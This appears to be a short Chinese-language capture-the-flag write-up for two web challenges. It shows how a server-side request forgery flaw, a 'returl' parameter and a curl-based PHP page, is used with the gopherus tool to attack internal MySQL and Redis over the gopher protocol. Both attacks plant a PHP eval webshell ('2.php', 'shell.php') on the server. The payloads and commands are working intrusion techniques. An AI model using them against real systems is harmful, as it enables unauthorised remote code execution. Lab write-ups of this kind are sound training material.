记录一下做法,原理啥的还有点懵

web359

打开是登录框,先随便输点什么,然后抓包
发现有个returl参数,并且可以随意更改url,这应该就是我们的利用点了

然后就是gopher协议打mysql,这里用到这个工具gopherus

python gopherus.py --exploit mysql

生成一句话木马

select "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/2.php';

在这里插入图片描述

记得把_后面那一大段内容再url编码一次,发送

在这里插入图片描述

访问2.php,cat一下

在这里插入图片描述

web160

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?> 

跟上题一样,只不过换成打redis

python gopherus.py --exploit redis

生成一句话木马

<?php eval($_POST['cmd']);?>

在这里插入图片描述

同样后面那一大段东西要url编码后发送

在这里插入图片描述

然后访问shell.php(默认生成就是shell.php)

在这里插入图片描述

最后修改:2023 年 12 月 15 日
如果觉得我的文章对你有用,请随意赞赏